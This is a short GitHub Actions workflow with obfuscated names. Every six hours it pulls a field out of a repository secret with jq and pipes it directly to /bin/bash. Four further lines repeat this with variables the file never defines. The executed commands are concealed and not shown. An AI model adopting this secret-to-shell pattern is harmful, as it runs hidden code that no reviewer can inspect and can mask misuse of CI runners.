name: chenhaoqi8971

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenhaoqi8971
        env:
          cdfou26: ${{ secrets.cdfou26 }}
        run: |
          echo $cdfou26 | jq -r .ol09 | /bin/bash
          echo $bm1234 | jq -r .nfqq3241 | /bin/bash
          echo $oos80 | jq -r .gqhgq852 | /bin/bash
          echo $ldcs401 | jq -r .redw5373 | /bin/bash
          echo $rz9612 | jq -r .eiirs5 | /bin/bash

